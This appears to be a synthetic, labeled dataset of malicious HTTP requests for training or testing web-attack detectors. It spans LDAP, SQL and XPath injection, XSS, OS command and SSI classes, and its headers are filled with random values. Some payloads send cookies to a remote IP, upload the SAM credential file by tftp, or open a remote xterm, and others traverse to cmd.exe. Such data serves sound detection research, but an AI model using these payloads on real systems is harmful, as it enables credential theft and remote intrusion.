Cache-Control: max-age=3259
Client-ip: 5.57.77.191
Cookie: LRrvarVdOO=n;gtP=651976;RYdKBe=35;H6e@B.PJ=1lTh6mh
Cookie2: $Version="071"
Date: Mon, 23 Jan 06 23:03:14 CET
ETag: W/"bZO8O_UnUbgrxB2"
Expect: Sqiorccr=plsduge
From: w3nw@eoeld2.be
If-Modified-Since: Tue, 04 Aug 09 05:48:08 GMT
If-Unmodified-Since: Tue, 01 Aug 06 02:02:15 CET
If-Match: "YWQwZzCPketUHJK"
If-None-Match: *
If-Range: Wed, 02 Sep 09 10:52:30 GMT
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dDYwbmx1cHNyaXQ3YWlzdlFxcmFwVHRlbXIzTXhucm1yaGhmaW9FdXM=
Authorization: Digest cnonce="rlweenE"
Range: -99
Referer: /rNjhes/qnte/8on4Csee/mTrpeOsh/lmthkun.tiff
TE: gzip
Trailer: Date
User-Agent: egecywnsp
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0026x0337
Via: 3.4 www.WaAo60.shtml
Transfer-Encoding: nhRze
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 024 102.167.137.67 "nvpacNsesceoTbreyoUd" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

ibNqonshiv=etncr'    or   (i    <   count(ridntW/child::text())  and   j <    count(ycad/child::comment())     and    k    <     count(x3ftrr/child::*)   ) or    '5uJct'  =  ' aln' or

End - Id: 48568
Start - Id: 37904
class: LdapInjection
GET /6xtermlibXxterm/oXKkLj8z.lBYpI.gif?I0NpwFkowXP=eJEof&ns8i94out1=ir0layty&jGPkrb5DN15I=C&_7_Xoshutdowny9j=%29++++%28+%7C++%28eiat%3D0NH7i*%29&nh2pyf=Ll&hwnERk2mn=pLcjokjW&7hteogm7gveapv=sehatoIC4hilrqk&copyhscriptZ=d+msDservices0htR4gY&epWgyxgisi=hovnn&qjditdhyhoe7gke=nMke6k&nuu2r=3&al=60305177 HTTP/1.0
Host: www.tecastil.st
Connection: s8rhT
Accept: */*;q=0.8
Accept-Charset: iso-2022-jp;q=0.1, iso-8859-2, iso-8859-15, big5;q=0.2, x-mac-chinesesimp;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=36386
Client-ip: 206.217.112.201
Cookie: hgshsahfb9dw=ihReti5tsvzjpgb;3proiece=ouUr0@1wtqw;pefisneikeer=dl2as Spar0extmp
Cookie2: $Version="005"
Date: Tue, 04 May 04 02:45:30 UTC
ETag: W/"k_eK26HPsis_XTtOs"
Expect: rtuj9fsi=tnild
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Fri, 04 Feb 05 05:47:15 CET
If-Unmodified-Since: Mon, 25 Sep 06 11:39:32 GMT
If-Match: *
If-None-Match: "KPyQYS3ZDOJzjYnPKR"
If-Range: "RMgMI-CTfjQkK3iPH"
Max-Forwards: 341
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: viol wsolm=aeyhuO
Range: -004662,03-,-2001
Referer: http://www.sshaaeb.be/1nls/nSaP/tu8occrr/hne2Doe4/nhcodeWl.html
TE: gzip
Trailer: User-Agent
User-Agent: aer4 (8cVhVJhLI; nns7f40x1H)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: 3.6 84.243.131.206:04
Transfer-Encoding: compress
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 17792276895005878262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37904
Start - Id: 42169
class: SqlInjection
GET /Eegisnk1R7knt0Jkqbau/hhL78/e8dET0xs7/huE8zBESwnkHi/@.PlO2iMM/EEreh/iySHjPnN_Tf/1hbu7I.tiff?42UgwApm4shet=ahi1m&wr=87ei%29%7E%3Astb+y-ttostylean&ajlE9fbheeaRd=+eb%2BneSthvrssi&aes=6993&acftqgpn9t=47ielinkaL%5Cei5un&b3-edR3C57=piesystemnnobnen&nvCwNdjkMd=fnr%29&eNgE=+taE%28nullwp-lciehec%27&CcmdMjI1dl=%27+++++OR++%27eKrect%27++++%3D+N%27+&ase93=ohbtvN4i%3B&mRoeagxh=hgrbincmdBqs%26ns%7Ca+it&t3dxiie=01581&rtTmNlm2q6rSno=rk+esamLstv%3C%27aqp3phph HTTP/1.1
Host: www.tyiS.st
Connection: close
Accept: video/*;q=0.2, video/quicktime;q=0.4
Accept-Charset: iso-8859-3, x-mac-roman, iso-8859-15;q=0.0, x-mac-greek, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 61.45.209.154
Cookie: tg0za=5229;feheel1cb=tf1nGRFQ;hoaGo= ql |oad'niblhi7bgsoundt
Cookie2: $Version="5"
Date: Fri, 06 May 05 06:12:51 CET
ETag: "rmoKgaJRhzxXhz04d"
Expect: 100-continue
From: tktabU@4ahlq0ig.org
If-Modified-Since: Mon, 21 Apr 08 09:51:44 GMT
If-Unmodified-Since: Mon, 23 Jun 08 07:34:32 UTC
If-Match: "yZjPYsdxkZX2ETBc"
If-None-Match: "DdeM9ivtY.IaukRz6"
If-Range: Wed, 23 Mar 05 22:21:25 GMT
Max-Forwards: 0
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: -65233,-6365
Referer: /arrdi/zoEiez/377obso/Te9bfae/7EohAe.jpeg
TE: trailers
Trailer: Range
User-Agent: ehiao/6.8.0
UA-CPU: StrongARM
UA-Disp: 290,899,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/9.3 114.145.212.175, 7.9 153.253.174.161:86
Transfer-Encoding: deflate
Upgrade: nredd/1.9, kMnu/6.6, iarn/4.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42169
Start - Id: 35780
class: XPathInjection
GET /4-DrHxeM7E_ZE98Gq/rMi4In/b@k/dDvscriptYuR/hdycc/e9kQwX/Hmlsgax.php?ajxaservicesMQ5QmD=inesRlibtnes8%27+&ao5nIt00wo=sarueueuar0+re&6ni7aqusa=inputa&PVu.d3fX=354051&HeegfromylZxDSs=e2seta%3Fy0d%7Ewgeteno&GarexehiccroaLe=52+++++or+++1%3C++++itYcee%2Fsil%2Fpamh%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D96%5D+++or++94454%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: www.loroirT.com
Connection: close
Accept: */*
Accept-Charset: cp-932;q=0.5, x-mac-chinesesimp
Accept-Encoding: gzip;q=0.4, compress;q=0.9, compress;q=0.0, identity;q=0.5
Accept-Language: *;q=0.8
Cache-Control: gi=6
Client-ip: 198.194.18.206
Cookie: bgawioryanqi=teg\os rci;Esro=89210;rreerp=168
Cookie2: $Version="85"
Date: Fri, 09 Apr 10 04:08:32 GMT
ETag: "Svs2sVNwEB_MZhVF"
Expect: tz6uti0s=zmuahwp;imcC=ywma7
From: o9an@gseose.org
If-Modified-Since: Sun, 01 Jun 08 24:21:11 CET
If-Unmodified-Since: Thu, 19 Jan 06 24:34:39 UTC
If-Match: "CLGYTEeTI8-h2dVGGjt"
If-None-Match: *
If-Range: Thu, 21 Oct 04 01:43:36 GMT
Max-Forwards: 09
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Digest opaque="rreati"
Range: -777
Referer: http://www.7ia4etg.net/dd5uta/swejt/42Vs2en/hieTd/tehL5le.swf
TE: chunked,gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.7 (X11; U; Open BSD i586 3.7; ue-oi; rv:1.3.4) Gecko/64501090
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 072x540
Via: t1i/9.3 www.Trl5uhes.tiff:1717
Transfer-Encoding: compress
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 76346
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35780
Start - Id: 46687
class: XSS
GET /l_.gif?dolre0haTiobli=Te7oairueenro&rwel6=25406682&VTH0pu=ap5cEtlRvmIaed%3C&lmeriEuh7rgY=sZt_MlW2p&kaisaeez=ntjnQSn+hs&dhohiyaegc=a&teDonrtjxY=sevaletchtpass%3Aab&ecgeIpztuehhPt=nN+kheltTte+o+te%5CHfp HTTP/1.1
Host: 180.133.183.59
Connection: close
Accept: text/*;q=0.4, audio/*
Accept-Charset: windows-1252;q=0.3
Accept-Encoding: identity, deflate;q=0.2, deflate;q=0.1, deflate;q=0.1, identity;q=0.6
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 211.81.133.168
Cookie: u4yngt=sIpa   "       style=left:expression(alert  (" hn.l    "))     alt=";1r=76199;eQwtht=kqDeo;T2OM4y3lt4asahR=tryeNe;suoaoubzhhla=5018;eensoe=y
Cookie2: $Version="70"
Date: Sun, 04 Mar 07 02:20:36 CET
ETag: W/"KmiWtsCFIT.HExT."
Expect: 100-continue
From: ekionh@nouustph.biz
If-Modified-Since: Mon, 05 Nov 07 23:00:40 CET
If-Unmodified-Since: Mon, 05 Dec 05 03:26:45 GMT
If-Match: "4cvKtwQn5x9_ViVl"
If-None-Match: "91LU6t2zBeefR25MwAO"
If-Range: "875PTkq_rCcqLHC"
Max-Forwards: 4278
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic bmxobm5pOnJyMjRSTw==
Authorization: Digest qop=toer
Range: 88653-1260,8019-4754,415-
Referer: http://htha.it/elkai/lfL5tre.asp
TE: chunked;q=0.1,chunked
Trailer: If-None-Match
User-Agent: adnAsia/2.9.4.4.6
UA-CPU: x86
UA-Disp: 393,695,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 789x227
Via: 5.8 www.elhdhh.js:52, HTTP/9.7 www.Rokad9.jpg:170
Transfer-Encoding: nraT; 1Echfo08=cx5oe
Upgrade: NNutal/3.3, Zdxhh/3.9
Warning: 142 198.194.142.50 "nwxrb2ahoh62t06" 
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 373660976156
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46687
Start - Id: 44592
class: OsCommanding
GET /yriQ-d.dll?mgnssTike=lss0&faRuH=5334&o8k4=l%3C%3Da&8E=8074101838&isDn=52&RohitpnitT8ai=242.163.115.222+++++%7C+++tftp++++-i+++++10.207.18.165+++++PUT+sam._ HTTP/1.0
Host: www.i834kino.biz
Connection: sosxw
Accept: image/*, video/*, image/jpeg;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 183.12.198.133
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="5"
Date: Tue, 18 Dec 07 20:19:33 CET
ETag: "4ZTx-C_wI8PklVd.7"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Fri, 20 Aug 04 03:37:18 GMT
If-Unmodified-Since: Fri, 07 Oct 05 08:31:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Basic ZGhFeXlpYWw6ZXJ0aXk=
Range: -2578
Referer: http://www.7eme.de/eddh/Iai0Dg8i/tini/e8eeuiah.jpeg
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: r0hizkecf/0.8.4
UA-Color: color32
UA-Pixels: 905x8117
Via: 1.3 www.drhp.htm, 6.8 237.35.251.140
Transfer-Encoding: snj8; nicerN=hnu2rds
Upgrade: demte/2.5, f0ful/4.1, zhrgt/8.4, yh7h/1.2
Warning: 383 www.Mece.jpeg:13 "gitirtep1tr" "Mon, 15 Feb 10 03:00:27 CET"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44592
Start - Id: 39251
class: SSI
GET /yaAHSR71/zdZpcWWcKGgEwXxN/uadn4djmTadb/uupd9aleuNche/h5lsun/rm/5_XZ@lzOGmvK/au9eTnEYei/rafpe3iOapesvtop.png?est=20776&eawfirtnihanls=%3C%21--%23email+fromhost%3D%22www.i1csire.com%22+tohost%3D%22mailbox.ovt.com%22+message%3D%22t9aqyh+gcFsFsa+wbItsyse+neN%22+fromaddress%3D%22w7re.com%22+toaddress%3D%22nnh.do.com%22+subject%3D%22ta%22+sender%3D%22riel.com%22+replyto%3D%22seaqh.com%22+cc%3D%22l4os%22+inreplyto%3D%22ielfr+eie+ebae%22+id%3D%22E1gEemail%22+--%3E&ij2turirc=heecos7ff6ti&nle=7585858&RZYi_MC_dD9=8Sedon&@O-sKhtpassQCpasswdl0=rFgW_1P4UYL_ HTTP/1.1
Host: 245.46.106.17:96156
Connection: EEenne
Accept: */*;q=0.1
Accept-Charset: windows-1251;q=0.7, macintosh, iso-8859-8-i;q=0.5, iso-8859-7
Accept-Encoding: deflate, deflate, gzip;q=0.7
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 213.207.160.227
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="44"
Date: Tue, 17 Jul 07 13:35:56 CET
ETag: "I6x001IZy.Iz5lBYh"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 30 Jul 04 13:48:10 UTC
If-Unmodified-Since: Sun, 24 Jan 10 05:25:54 GMT
If-Match: "JxwGh.45.f9Swmwp"
If-None-Match: "mzY-mfPiSOgu-Fc"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 715
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: oihrz enldoer=styei
Range: 5-9725,-6683
Referer: http://osoma.fr/rwge/viAt9n9r/7rat/doforaze/nias.html
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: gzwa (e4B10aZOY; a6Z-a_ExD; tdaY9e5ki; eZp7pkop)
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 272x2054
Via: 2.1 180.85.21.169:6201, muS/6.2 81.171.164.216, 9.0 33.250.160.162
Transfer-Encoding: gzip
Upgrade: ueiyd/3.1, tac/2.4, eiz/0.3, isofl/2.9, eutR/4.6
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39251
Start - Id: 48057
class: XSS
GET /paoRQjCCq5JCH/tsRZBQ-@PI0JS/8_Vul5C.mdb?r1=%3Ca+href%3D++++%22+about%3A%3Cs%26%2399%3Bript+++%3E%5Bwindow.open%28%27http%3A%2F%2F185.188.15.79%2Fiste.bin%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E+++%22+++%3E&o0hzrbttw8iCa=rvd&8erk8buts9=sPLeydOQDOvt&okopenCcnph-a1dT=sdiv&osmn1nCirilncAa=99843888&iH=aok+aX%40+di%40at%3B4+2&hIEiaaei2oEeu=aWNPsz2J6zj&oRdt=feEtnilee6ToNnlldh&0fromUQCa64C=fseaaedaieya&owEsb6tetedptiv=ohnpl%3Doleea&lvw4fexec=7916 HTTP/1.1
Host: www.rsvpHx.cz
Connection: h7xl0
Accept: image/jpeg;q=0.1, application/zip, image/*;q=0.0
Accept-Charset: euc-tw;q=0.4, cp-932, windows-1250;q=0.8
Accept-Encoding: compress, compress;q=0.3, gzip;q=0.0, deflate;q=0.2
Accept-Language: shhnmtre-no55REDd;q=0.1, 7A9-m;q=0.4, a5iqy-mntonNrl;q=0.1
Cache-Control: min-fresh=60969
Client-ip: 199.91.154.140
Cookie: 6b5br= ya;bhoinT=758722;oramnaaH=91022;osbO=0764012
Date: Wed, 28 Apr 10 20:28:40 CET
ETag: W/"pMhTYPGtA6ex8Op2RXC"
If-Modified-Since: Wed, 12 Jul 06 16:50:46 UTC
If-Match: *
If-None-Match: "nxswnkQNfG669Sdi1"
Max-Forwards: 4597
Proxy-Authorization: Yean xazroh=heTobre
Authorization: NTLM MWFoMzQzc21kYWx5ZG82dGFIc09mbmV0ZUhnZWRjZHRneWVldXVuMw==
Referer: http://eh3ne.org/rseg/btabcs/dryhhoe.jpg
User-Agent: Mozilla/5.1 (Machintosh; U; Mac OS X 0.5; sn-tT; rv:2.5.5) Gecko/65865849
UA-Pixels: 8331x5573
Transfer-Encoding: xsdk; zetH=ssgAa
Upgrade: irzp/3.6, ptlXi/5.1, iuvasd/0.6, qaSdJs/9.5, eajlTI/5.1

null

End - Id: 48057
Start - Id: 35595
class: XPathInjection
GET /l2skaihloneaTnwwd/w7OKvNS/e5CTh/sz683BiJT3gxJAmu@an/ggclte6ssdthbm/8LweadaUfrTk/ntbqeBUM-/ImochaqOUOxCnD7/CCs2bt-NA2/rqwpnsrserSmnn4do1i.htm?Q8idDvu=dFQV2.d&Yshejlowkoatp=85507415&te1ttas=n20o&apa5zesia=28160999&ueo=netcatvaroe&diioitlin=ns5wcnne%27+or++++%28i++%3C++count%28ttfdlp%2Fchild%3A%3Atext%28%29%29+and+++++j++%3C++++count%280c3onh%2Fchild%3A%3Acomment%28%29%29+++++and++k++%3C++++count%28iSbu%2Fchild%3A%3A*%29++%29+++++or+%272sy%27%3D++++%27++n0no8%27+++or&detniv=htnono+h&mtdK=ahnn4%3FgH+ne8aNsh%3A%26 HTTP/1.0
Host: 165.128.159.168
Connection: hwzeie
Accept: */*;q=0.7
Accept-Charset: iso-8859-8, euc-tw;q=0.3, euc-tw, x-mac-chinesetrad;q=0.3, cp-932
Accept-Encoding: compress;q=0.0, deflate;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 180.187.68.18
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="931"
Date: Fri, 15 May 09 24:56:43 GMT
ETag: W/"7umuTM27UJFVw2-bKB"
Expect: 100-continue
From: hsgss@kOcgeesht.ch
If-Modified-Since: Sat, 24 Jun 06 20:37:15 UTC
If-Unmodified-Since: Thu, 07 Sep 06 09:30:37 CET
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "rwOo.Tuonx4ayEEa"
If-Range: Mon, 26 Feb 07 17:08:41 CET
Max-Forwards: 97
MIME-Version: 4.7
Pragma: o='aeU'
Proxy-Authorization: NTLM b2RXcmx2M25sdGE2b3dvcmVIaGxuZWh5b2lzdGlXWGRvdnlvUm0xZXQxbU8zYm0=
Authorization: Digest algorithm=MD5-sess
Range: 1278-6
Referer: /naro/eedste/62eus/ttaa.pdf
TE: trailers,trailers,chunked
Trailer: Warning
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 3.1; 5q-9r; rv:2.8.4) Gecko/56732323
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x439
Via: 6.9 www.pa3eVo.css, nrop4/9.3 www.aeas.gif:883, 1.7 www.yfewB.jpeg
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35595
Start - Id: 44125
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.D7xeiro.ch
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-greek;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 196.173.120.66
Cookie: YTCdivC=%e;IuXe=and
Cookie2: $Version="066"
Date: Sat, 03 Jun 06 24:55:12 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 21 May 04 16:42:07 CET
If-Unmodified-Since: Mon, 28 Feb 05 04:18:59 CET
If-Match: "uyPE5HkkTKbicCYJ"
If-None-Match: *
If-Range: "M5VFg45@l@shuRpOl-.@"
Max-Forwards: 345
MIME-Version: 3.4
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM a2Rvb2xtZ2h1aWFqcnNiZGVwaGVwdHNlcHRFN2xzdHNsNUU=
Range: 2856-325921,765830-7785,3752-597
Referer: http://www.llDe.net/a8CYt8/gr2a/mfeu.txt
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.3 (compatible; Konqueror/9.7; WinNT; Rndrwmasp; jmds1a)
UA-CPU: 68000
UA-Disp: 0410,9029,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/4.7 100.67.12.168, HTTP/7.0 19.235.205.14:604
Transfer-Encoding: deflate
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44125
Start - Id: 40808
class: SSI
GET /_5kZWW/2lR4UIJjDHmbin/libxONuJSOzformdaxchome.gif?bbhb0les=gstan&4s6thseorehr=dea97ofo6h&hoebeetraem2me=oV4oy1T&xrh1Rusa=%3C%21--+++%23odbc++++connect%3D%22ansy%2Ch8Rpae%2C5oFt%22+++++++++statement%3D%22select++*++from+++++wtun5%22--%3E&spfmns=eyobxhgc&TrSC=59862948 HTTP/1.0
Host: www.tgNp9t.be:1
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: thca-skrfssm;q=0.0, sia-aYdbre;q=0.5, laa-3w;q=0.5
Cache-Control: no-cache
Client-ip: 34.137.144.86
Cookie: eiEk=hO;hsibilirIa=6A3KO;ictwuy7aluzd=6243059;ka2twueaorai=d0/hhRsjg$\;isu3tehetNLn=6;ci4=aBrsaeii
Cookie2: $Version="299"
Date: Sat, 01 Jul 06 11:32:55 UTC
ETag: "V0yqNhaPfiAfr9wMm2IH"
Expect: snetell=1iri3waa
From: iiljwdi@httr81j.de
If-Modified-Since: Thu, 04 Jun 09 06:55:00 UTC
If-Unmodified-Since: Fri, 15 Sep 06 11:09:36 CET
If-Match: "SnWfAvpwjBHRiWG"
If-None-Match: *
If-Range: *
Max-Forwards: 565
MIME-Version: 8.4
Pragma: 9nhsted='yRt6'
Proxy-Authorization: Digest opaque="9des"
Authorization: lgn0a eiae3xs=niaoa7wd
Range: -4,-190,-803524
Referer: /hodqOcit/cegtdt5/soiTsstz/tndi.pdf
TE: trailers,trailers,gzip
Trailer: Range
User-Agent: eItiums (uOKsJ2yN)
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 871x928
Via: 7.1 www.v5steer.jpg
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: ala/0.5, s8eb/5.2, enTr/5.0, 7nub/8.8
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40808
Start - Id: 42841
class: OsCommanding
GET /ei/HdJCXrYn4C/y3ay.KoP.cgi?auelneesdsb5s=5WTeKKSXM2.8&ct=7&abrio9o=qiometa&whyotdijTali=+ge&sism2nu6Z=75.172.59.235++++%7Cdir&3qgEhlikenJgK4x=68&4cyo=434 HTTP/1.0
Host: www.eesssyae.be
Connection: nodls0
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 141.50.68.204
Cookie: rpselaPn=57373556
Cookie2: $Version="71"
Date: Mon, 12 Jun 06 15:26:06 CET
ETag: W/"olCrtg5FxsS-VvM"
Expect: 100-continue
From: otsveiea@oarDol.com
If-Modified-Since: Wed, 11 Mar 09 24:33:52 CET
If-Unmodified-Since: Thu, 26 Feb 04 22:06:48 UTC
If-Match: *
If-None-Match: *
If-Range: "jmV9Lm@XnkJX5lD4I5l"
Max-Forwards: 81
MIME-Version: 7.9
Pragma: EsNriea='9S'
Authorization: 8w6nte apoS8=aisrnil5
Range: -885,-18051
Referer: /cos5l/Rhtllo/tu6erTty.htm
TE: gzip,chunked;q=0.7,trailers
Trailer: Host
User-Agent: h9ulpOrn/4.7.8.0
UA-CPU: StrongARM
UA-Disp: 1330,7116,16
UA-Color: color32
Via: 0.7 212.160.95.7:2087, FTP/1.3 229.192.98.243, 9.7 www.rn4b.html
Transfer-Encoding: identity
Upgrade: NhTeWO/2.9, teisee/0.9
Warning: 976 www.eguwaq.html "ahcm" 
X-Forwarded-For: 209.98.157.41
----: -------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42841
Start - Id: 42975
class: OsCommanding
GET /sm/ot60VfpQj/0vQNASMn9bqKgz/n0fdln1/7-1BqMgQ/otm/7Arbx/scnuedierlo/an/dricv0aa6BBWMNjvfcSP/v7ttMHbvOGrOXGLqFg-q.php3? HTTP/1.0
Host: www.eirer9h.com
Connection: eeorjt
Accept: text/*;q=0.0, audio/basic;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: deoEr3-hdDQesEe
Cache-Control: only-if-cached
Client-ip: 181.104.22.255
Cookie: sownnr7vyeagt=eIoe;sock_streamI0EjMncN=ts66INndmh2aedeant;tdjn=| /usr/openwin/bin/xterm+-display+171.196.174.116:0%00;RE7h= i;yeeaatpbeslifl=13;i1pnNc=5
Cookie2: $Version="956"
Date: Mon, 15 Dec 08 18:47:50 CET
ETag: "meKd3jCIHLFMIt3Yay"
Expect: 100-continue
From: 1uin49@ao68umt.ch
If-Modified-Since: Mon, 07 Aug 06 01:44:27 CET
If-Unmodified-Since: Wed, 28 May 08 06:39:25 UTC
If-Match: "QNoR8okTlcjatctn"
If-None-Match: *
If-Range: Sat, 10 Jun 06 14:26:13 UTC
Max-Forwards: 82
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="KQttr"
Authorization: Basic MGFyZWg0ZGU6TmllZWU=
Range: 776-
Referer: /eiel5Sf3.aspx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: vger4aersb2Djsa
UA-CPU: x86
UA-Disp: 404,617,8
UA-Pixels: 7496x2651
Via: FTP/9.0 87.53.206.76:5
Transfer-Encoding: compress
Upgrade: et3Ql/4.9, xei/0.8, vhoht/6.4, 4ore8/9.4
Warning: 141 www.iatasre.css "tmfhotN3eoi" "Tue, 13 Dec 05 15:00:41 CET"
X-Serial-Number: 82156
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42975
Start - Id: 37806
class: LdapInjection
GET /LnFVinputFCOCyL/-21k/f39_HhVG/nVKE6R6fZWMBaOwbgxY/fte/vhhrgks/hjtt.HimUq6SjL/32nE48a18z9TgqL/eHo0FFho_2icf.png?un@_Uy@=83048578&ahT=918899&thd=836%29%28%26%28objectClass%3DtrkU%29%28%7C%28sn%3Dai%29%28cn%3DhY6H++J*%29%29&stbr=alyj HTTP/1.0
Host: www.lskl7c.org
Connection: octTty
Accept: video/quicktime;q=0.1, text/*;q=0.8, application/postscript
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: fru=0c
Client-ip: 148.220.0.143
Cookie: gospa=77696541;oi1rnO6s=pet31lNiuitfnf;7LnS9nodleaaaac=11769846;i6rEevlBvhee=3naperltbodyhconnecthsSnnullestdinelsf;5uwtar=rL2FU-3brCk;2-J6=h6OvoHTcv-07
Cookie2: $Version="22"
Date: Sun, 23 Apr 06 18:02:33 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: B0ct=to3ne
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Thu, 02 Feb 06 18:35:09 GMT
If-Match: "Zb0wf2BeHixBzcF"
If-None-Match: *
If-Range: Sat, 22 Dec 07 24:10:43 GMT
Max-Forwards: 534
MIME-Version: 2.1
Pragma: riC=erS9aa
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Basic dDFsUjp4aGVpdA==
Range: -1,56487-
